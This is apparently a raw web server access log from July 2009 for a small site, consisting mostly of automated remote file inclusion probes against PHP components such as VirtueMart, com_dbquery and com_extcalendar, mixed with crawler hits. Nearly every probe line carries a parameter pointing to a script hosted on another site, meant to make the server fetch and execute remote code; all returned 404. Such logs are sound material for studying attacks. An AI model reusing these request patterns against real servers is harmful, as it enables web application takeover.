220.231.126.252 - - [01/Jul/2009:10:36:18 +0000] "GET /logs/components/com_virtuemart/errors.php?error=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 318
220.231.126.252 - - [01/Jul/2009:10:36:18 +0000] "GET /logs/access_log%20%20/components/com_virtuemart/errors.php?error=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 331
220.231.126.252 - - [01/Jul/2009:10:36:18 +0000] "GET /components/com_virtuemart/errors.php?error=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 313
123.125.64.13 - - [01/Jul/2009:10:36:46 +0000] "GET /robots.txt HTTP/1.1" 404 287
66.172.22.2 - - [01/Jul/2009:10:37:17 +0000] "GET /logs//include/mail.inc.php?skin_board_path=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 303
66.172.22.2 - - [01/Jul/2009:10:37:17 +0000] "GET //include/mail.inc.php?skin_board_path=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 298
66.172.22.2 - - [01/Jul/2009:10:37:18 +0000] "GET /logs//include/mail.inc.php?skin_board_path=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 303
66.172.22.2 - - [01/Jul/2009:10:37:18 +0000] "GET //include/mail.inc.php?skin_board_path=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 298
72.14.199.85 - - [01/Jul/2009:10:46:12 +0000] "GET /feeds/posts/default HTTP/1.1" 404 296
87.250.254.242 - - [01/Jul/2009:10:51:05 +0000] "GET / HTTP/1.1" 200 125
66.249.71.104 - - [01/Jul/2009:10:58:59 +0000] "GET /icons/back.gif HTTP/1.1" 304 -
159.213.87.22 - - [01/Jul/2009:11:02:02 +0000] "GET / HTTP/1.1" 200 125
148.233.159.58 - - [01/Jul/2009:11:02:03 +0000] "GET / HTTP/1.1" 200 125
67.69.254.243 - - [01/Jul/2009:11:02:04 +0000] "GET / HTTP/1.1" 200 125
65.49.26.206 - - [01/Jul/2009:11:02:40 +0000] "GET / HTTP/1.0" 200 125
200.14.96.57 - - [01/Jul/2009:11:02:41 +0000] "GET / HTTP/1.0" 200 125
114.127.246.36 - - [01/Jul/2009:11:03:13 +0000] "GET / HTTP/1.1" 200 125
74.6.8.98 - - [01/Jul/2009:11:22:45 +0000] "GET /robots.txt HTTP/1.0" 404 275
74.6.8.98 - - [01/Jul/2009:11:22:45 +0000] "GET /logs/?N=D HTTP/1.0" 200 1867
66.249.71.104 - - [01/Jul/2009:11:24:04 +0000] "GET /2009/02/blog-post.html HTTP/1.1" 304 -
88.191.37.60 - - [01/Jul/2009:11:25:37 +0000] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 288
88.191.37.60 - - [01/Jul/2009:11:25:37 +0000] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 288
88.191.37.60 - - [01/Jul/2009:11:25:38 +0000] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 293
88.191.37.60 - - [01/Jul/2009:11:25:38 +0000] "GET /logs/access_log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 306
88.191.37.60 - - [01/Jul/2009:11:25:38 +0000] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 293
88.191.37.60 - - [01/Jul/2009:11:25:38 +0000] "GET /logs/access_log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 306
202.181.243.113 - - [01/Jul/2009:11:38:19 +0000] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 288
202.181.243.113 - - [01/Jul/2009:11:38:26 +0000] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 293
202.181.243.113 - - [01/Jul/2009:11:38:37 +0000] "GET /logs/access_log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 306
195.207.160.102 - - [01/Jul/2009:11:42:08 +0000] "GET /logs/access_log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 304
195.207.160.102 - - [01/Jul/2009:11:42:08 +0000] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 293
195.207.160.102 - - [01/Jul/2009:11:42:08 +0000] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 288
70.86.9.234 - - [01/Jul/2009:11:42:38 +0000] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://scairo.com/templates/beez/copyright.txt?? HTTP/1.1" 404 328
70.86.9.234 - - [01/Jul/2009:11:42:38 +0000] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://scairo.com/templates/beez/copyright.txt?? HTTP/1.1" 404 333
70.86.9.234 - - [01/Jul/2009:11:42:38 +0000] "GET /logs/access_log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://scairo.com/templates/beez/copyright.txt?? HTTP/1.1" 404 344
70.86.9.234 - - [01/Jul/2009:11:44:34 +0000] "GET /logs/access_log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://scairo.com/templates/beez/copyright.txt?? HTTP/1.1" 404 346
216.129.119.14 - - [01/Jul/2009:11:49:37 +0000] "GET /robots.txt HTTP/1.0" 404 275
88.191.37.60 - - [01/Jul/2009:11:59:42 +0000] "GET /logs/access_log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 304
88.191.37.60 - - [01/Jul/2009:12:02:10 +0000] "GET /logs/access_log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 304
66.249.71.104 - - [01/Jul/2009:12:09:38 +0000] "GET / HTTP/1.1" 200 125
220.231.126.252 - - [01/Jul/2009:12:16:31 +0000] "GET /logs/main.php?x=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 290
220.231.126.252 - - [01/Jul/2009:12:16:31 +0000] "GET /logs/access_log%20%20/main.php?x=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 303
220.231.126.252 - - [01/Jul/2009:12:16:31 +0000] "GET /main.php?x=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 285
220.231.126.252 - - [01/Jul/2009:12:25:00 +0000] "GET /logs/access_log/main.php?x=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 301
211.233.11.27 - - [01/Jul/2009:12:38:59 +0000] "GET ///vwar/backup/errors.php?error=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 301
206.196.125.113 - - [01/Jul/2009:12:42:06 +0000] "GET /atom.xml HTTP/1.1" 200 4103
87.98.222.18 - - [01/Jul/2009:12:45:54 +0000] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 316
87.98.222.18 - - [01/Jul/2009:12:45:54 +0000] "GET /logs/access_log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 329
87.98.222.18 - - [01/Jul/2009:12:45:54 +0000] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 311
87.98.222.18 - - [01/Jul/2009:12:45:54 +0000] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 353
87.98.222.18 - - [01/Jul/2009:12:45:54 +0000] "GET /logs/access_log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 371
87.98.222.18 - - [01/Jul/2009:12:45:54 +0000] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 358
87.98.222.18 - - [01/Jul/2009:12:48:14 +0000] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 310
87.98.222.18 - - [01/Jul/2009:12:48:14 +0000] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 305
87.98.222.18 - - [01/Jul/2009:12:48:14 +0000] "GET /logs/access_log%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 323
123.143.98.5 - - [01/Jul/2009:12:54:25 +0000] "GET ///vwar/backup/errors.php?error=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 301
87.98.222.18 - - [01/Jul/2009:12:56:44 +0000] "GET /logs/access_log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 321
67.69.254.243 - - [01/Jul/2009:12:56:50 +0000] "GET / HTTP/1.1" 200 125
159.213.87.22 - - [01/Jul/2009:12:57:12 +0000] "GET / HTTP/1.1" 304 -
67.69.254.243 - - [01/Jul/2009:12:57:40 +0000] "GET / HTTP/1.1" 200 125
62.175.249.249 - - [01/Jul/2009:12:57:43 +0000] "GET / HTTP/1.1" 200 125
203.160.1.71 - - [01/Jul/2009:12:58:09 +0000] "GET / HTTP/1.1" 304 -
151.11.83.170 - - [01/Jul/2009:12:58:11 +0000] "GET / HTTP/1.0" 200 125
203.160.1.71 - - [01/Jul/2009:12:58:13 +0000] "GET / HTTP/1.1" 304 -
67.69.254.243 - - [01/Jul/2009:12:58:17 +0000] "GET / HTTP/1.1" 200 125
60.29.241.106 - - [01/Jul/2009:12:58:39 +0000] "GET / HTTP/1.0" 304 -
203.160.1.71 - - [01/Jul/2009:12:58:40 +0000] "GET / HTTP/1.1" 304 -
83.16.182.130 - - [01/Jul/2009:12:58:49 +0000] "GET /main.php?x=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 285
83.16.182.130 - - [01/Jul/2009:12:58:49 +0000] "GET /logs/main.php?x=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 290
83.16.182.130 - - [01/Jul/2009:12:58:49 +0000] "GET /logs/access_log%20%20/main.php?x=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 303
83.98.209.71 - - [01/Jul/2009:13:01:02 +0000] "GET /logs/access_log///vwar/backup/errors.php?error=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 317
83.98.209.71 - - [01/Jul/2009:13:01:03 +0000] "GET /logs///vwar/backup/errors.php?error=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 306
83.98.209.71 - - [01/Jul/2009:13:01:03 +0000] "GET ///vwar/backup/errors.php?error=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 301
65.254.39.210 - - [01/Jul/2009:13:08:54 +0000] "GET /logs/access_log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 336
65.254.39.210 - - [01/Jul/2009:13:08:54 +0000] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 320
65.254.39.210 - - [01/Jul/2009:13:08:54 +0000] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 325
83.16.182.130 - - [01/Jul/2009:13:09:18 +0000] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 323
83.16.182.130 - - [01/Jul/2009:13:09:18 +0000] "GET /logs/access_log%20%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 336
83.16.182.130 - - [01/Jul/2009:13:09:18 +0000] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 318
220.231.126.252 - - [01/Jul/2009:13:10:33 +0000] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 318
220.231.126.252 - - [01/Jul/2009:13:10:33 +0000] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 323
220.231.126.252 - - [01/Jul/2009:13:10:33 +0000] "GET /logs/access_log%20%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 336
91.192.20.164 - - [01/Jul/2009:13:16:52 +0000] "GET /logs/access_log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 337
91.192.20.164 - - [01/Jul/2009:13:16:52 +0000] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 321
91.192.20.164 - - [01/Jul/2009:13:16:52 +0000] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 326
213.198.4.181 - - [01/Jul/2009:13:20:31 +0000] "GET /logs/access_log//components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.0" 404 325
213.198.4.181 - - [01/Jul/2009:13:20:31 +0000] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.0" 404 309
213.198.4.181 - - [01/Jul/2009:13:20:31 +0000] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.0" 404 314
87.98.222.18 - - [01/Jul/2009:13:20:51 +0000] "GET /logs/access_log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 327
208.38.187.136 - - [01/Jul/2009:13:25:22 +0000] "GET /logs/access_log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 366
208.38.187.136 - - [01/Jul/2009:13:25:22 +0000] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 350
208.38.187.136 - - [01/Jul/2009:13:25:22 +0000] "GET /logs/access_log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 366
208.38.187.136 - - [01/Jul/2009:13:25:23 +0000] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 355
208.38.187.136 - - [01/Jul/2009:13:25:23 +0000] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 355
208.38.187.136 - - [01/Jul/2009:13:25:24 +0000] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 350
208.38.187.136 - - [01/Jul/2009:13:25:26 +0000] "GET /logs/access_log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 366
208.38.187.136 - - [01/Jul/2009:13:25:26 +0000] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 355
208.38.187.136 - - [01/Jul/2009:13:25:27 +0000] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 350
208.38.187.136 - - [01/Jul/2009:13:25:27 +0000] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 355
208.38.187.136 - - [01/Jul/2009:13:25:27 +0000] "GET /logs/access_log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 366
208.38.187.136 - - [01/Jul/2009:13:25:27 +0000] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 350
60.43.229.5 - - [01/Jul/2009:13:26:02 +0000] "GET /logs/access_log%20%20//include/admin.lib.inc.php?site_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 309
60.43.229.5 - - [01/Jul/2009:13:26:02 +0000] "GET //include/admin.lib.inc.php?site_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 291
60.43.229.5 - - [01/Jul/2009:13:26:02 +0000] "GET /logs//include/admin.lib.inc.php?site_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 296
83.98.209.71 - - [01/Jul/2009:13:27:37 +0000] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 350
83.98.209.71 - - [01/Jul/2009:13:27:37 +0000] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 355
83.98.209.71 - - [01/Jul/2009:13:27:37 +0000] "GET /logs/access_log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 366
83.16.182.130 - - [01/Jul/2009:13:28:27 +0000] "GET /logs/access_log/main.php?x=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 301
69.163.139.56 - - [01/Jul/2009:13:28:33 +0000] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 350
69.163.139.56 - - [01/Jul/2009:13:28:34 +0000] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 355
69.163.139.56 - - [01/Jul/2009:13:28:34 +0000] "GET /logs/access_log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 366
69.163.139.56 - - [01/Jul/2009:13:28:40 +0000] "GET /logs/access_log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 366
69.163.139.56 - - [01/Jul/2009:13:28:40 +0000] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 350
69.163.139.56 - - [01/Jul/2009:13:28:40 +0000] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 355
83.98.209.71 - - [01/Jul/2009:13:30:26 +0000] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 355
83.98.209.71 - - [01/Jul/2009:13:30:27 +0000] "GET /logs/access_log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 366
83.98.209.71 - - [01/Jul/2009:13:30:27 +0000] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 350
83.98.209.71 - - [01/Jul/2009:13:31:34 +0000] "GET /logs/access_log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 366
83.98.209.71 - - [01/Jul/2009:13:31:35 +0000] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 350
83.98.209.71 - - [01/Jul/2009:13:31:36 +0000] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 355
213.198.4.181 - - [01/Jul/2009:13:32:48 +0000] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.0" 404 314
213.198.4.181 - - [01/Jul/2009:13:32:48 +0000] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.0" 404 309
218.146.231.194 - - [01/Jul/2009:13:32:54 +0000] "GET /logs/access_log//convert/mvcw.php?step=1&vwar_root=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 310
218.146.231.194 - - [01/Jul/2009:13:32:54 +0000] "GET //convert/mvcw.php?step=1&vwar_root=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 294
218.146.231.194 - - [01/Jul/2009:13:32:54 +0000] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 299
62.77.32.217 - - [01/Jul/2009:13:33:21 +0000] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 350
62.77.32.217 - - [01/Jul/2009:13:33:21 +0000] "GET /logs/access_log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 366
62.77.32.217 - - [01/Jul/2009:13:33:22 +0000] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 355
62.77.32.217 - - [01/Jul/2009:13:33:26 +0000] "GET /logs/access_log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 366
62.77.32.217 - - [01/Jul/2009:13:33:30 +0000] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 350
62.77.32.217 - - [01/Jul/2009:13:33:30 +0000] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 355
60.43.229.5 - - [01/Jul/2009:13:34:16 +0000] "GET /logs/access_log//include/admin.lib.inc.php?site_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 307
83.98.209.71 - - [01/Jul/2009:13:36:04 +0000] "GET /logs/access_log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 368
62.77.32.217 - - [01/Jul/2009:13:46:31 +0000] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 355
62.77.32.217 - - [01/Jul/2009:13:46:32 +0000] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 350
62.77.32.217 - - [01/Jul/2009:13:46:32 +0000] "GET /logs/access_log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 368
